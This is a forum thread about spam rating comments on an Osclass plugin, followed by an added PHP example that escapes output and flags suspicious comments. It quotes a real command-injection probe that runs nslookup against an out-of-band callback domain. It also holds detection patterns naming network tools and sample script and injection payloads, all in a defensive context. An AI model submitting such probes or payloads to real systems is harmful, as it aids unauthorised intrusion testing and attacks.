Osclass Support Forums

Osclass plugin support => User Rating Plugin => Topic started by: Ajit Sahane on May 24, 2023, 11:19:32 AM

Title: Rating comment spam hack attempt
Post by: Ajit Sahane on May 24, 2023, 11:19:32 AM
I found a lot of comment-field spam and hack code submitted by hackers. If user rating auto-approve is set, then anybody can submit a fake 1-5* rating with a comment value like this: &nslookup -q=cname hitmtjqtyxgegbc74e.bxss.me&

So, this plugin's comment text needs to filter out that HTML and SQL query code. Text submission needs sanitization.

Check the screenshot.
Title: Re: Rating comment spam hack attempt
Post by: MB Themes on May 24, 2023, 11:46:00 AM
Enable rating for logged in users only.
Text is sanitized and I do not think it represents any issue. If you print this on the website, I expect it's printed as text and not as HTML code.
Title: Re: Rating comment spam hack attempt
Post by: Ajit Sahane on May 25, 2023, 06:25:15 AM
Yes. Now validation is ON, and the website prints content in text format, not HTML.

So, not a big issue.

Just be aware of this type of hack attempt for future security.

It clearly shows that bad actors are trying to carry out unusual activities.
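
Added example, not part of the thread and not the User Rating Plugin's code: the two controls discussed above, shown in plain PHP. One function prints a stored comment as text rather than HTML; the other keeps auto-approve from publishing comments that look like scanner probes. The function names and the patterns are assumptions made for illustration, and the sample comments are constructed.

```php
<?php
// Added example; not code from the User Rating Plugin. All names are hypothetical.

// Output encoding: the stored comment reaches the page as text, never as markup.
function render_comment(string $comment): string
{
    return htmlspecialchars($comment, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Heuristic only (constructed patterns): reasons a comment looks like a scanner probe.
function probe_reasons(string $comment): array
{
    $rules = [
        'shell metacharacter followed by a network command'
            => '/[&|;`$]\s*\(?\s*(nslookup|dig|ping|curl|wget)\b/i',
        'HTML/script markup' => '/<\s*\/?\s*(script|img|svg|iframe)\b/i',
        'SQL injection keywords'
            => '/\bunion\s+select\b|\bsleep\s*\(|\bor\s+1\s*=\s*1\b/i',
    ];
    $hits = [];
    foreach ($rules as $reason => $pattern) {
        if (preg_match($pattern, $comment) === 1) {
            $hits[] = $reason;
        }
    }
    return $hits;
}

// Auto-approve only clean comments; anything suspicious waits for a moderator.
function moderation_status(string $comment, bool $autoApprove): string
{
    return ($autoApprove && probe_reasons($comment) === []) ? 'approved' : 'pending';
}

// Constructed sample comments (placeholder domain, not real indicators).
$samples = [
    'Fast shipping, item as described.',
    '&nslookup -q=cname probe.example.invalid&',
    '<script>alert(1)</script>',
];
foreach ($samples as $comment) {
    printf(
        "%-8s | %s | %s\n",
        moderation_status($comment, true),
        render_comment($comment),
        implode('; ', probe_reasons($comment)) ?: '-'
    );
}
```

The pattern check only decides whether a comment is published automatically. What keeps a stored comment from being interpreted as markup is the escaping applied when it is printed.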